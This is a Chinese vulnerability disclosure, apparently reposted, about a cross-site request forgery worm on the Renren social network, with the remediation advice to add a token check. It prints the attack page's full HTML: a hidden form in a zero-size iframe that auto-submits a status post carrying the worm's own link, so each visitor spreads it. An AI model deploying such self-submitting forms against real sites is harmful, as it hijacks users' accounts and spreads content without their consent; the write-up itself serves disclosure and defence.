脚本页面http://bookman.sinaapp.com/doover.php,访问该页面后会发送一条状态“已经结束了,这是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php”
详细说明:
看了下那个链接的源代码,是通过人人逛街的接口提交的。
接口地址http://j.renren.com/publisher/status,只要post一个参数content到接口即可。
这个页面post的content内容就是“已经结束了,这是我的自白xxxx”。
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>爱你的说</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
数字bookman爱你。欢迎访问“肖寒bookman”的人人空间。
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="post" target="destination">
<input type="text" name="synsbcp" www.jb51.net value="1"/>
<p>raw: <input type="text" name="content" value="已经结束了,这是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>
<input type="submit" value="submit" />
</form>
</div>
<script>
document.akiko.submit();
</script>
</body>
</html>
修复方案:
人人比我懂的多。以前有次flash的类似的,传播是站内信吧。
补漏洞很简单,加一个token验证即可。
低级错误一枚,从网不行啊。
作者 leo108 and 白熊一枚
如对本文有疑问,
点击进行留言回复!!
相关文章:
-
-
-
-
-
-
-
-
-
-
关于XSS漏洞另一个攻击趋势
XSS漏洞一般是基于WEB程序的输入输出问题,但最近80SEC开始发现了一系列以IE为内核的第三方浏览器的漏洞,在评估其中的XSS漏洞,我们发现了基于浏览器软件...
[阅读全文]
-
网友评论